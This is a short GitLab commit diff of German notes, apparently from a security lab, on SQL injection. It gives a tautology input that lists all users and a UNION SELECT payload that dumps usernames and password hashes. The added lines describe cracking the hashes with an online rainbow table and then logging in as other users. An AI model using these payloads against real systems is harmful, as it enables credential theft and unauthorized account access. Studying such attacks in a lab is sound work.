Commit 1303e973 authored by Georg Gottleuber's avatar Georg Gottleuber
Browse files

Update SQL-Injection.md

parent 92322f1d
......@@ -3,4 +3,6 @@ Eingabe: 1
# Hack
Eingabe `foo' or '0' = '0` zeigt alle Benutzer an
# Hack2
Eingabe `foo' or '0' = '0' union select user,password from users where '0' = '0` zeigt alle Benutzer + Passworthash
\ No newline at end of file
Eingabe `foo' or '0' = '0' union select user,password from users where '0' = '0` zeigt alle Benutzer + Passworthash.
Die Passwörter können nun in einer Rainbowtable nachgeschaut werden (z.B. auf https://crackstation.net/ )
Nun kann man sich mit anderen Benutzerkennungen anmelden.
Supports Markdown
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment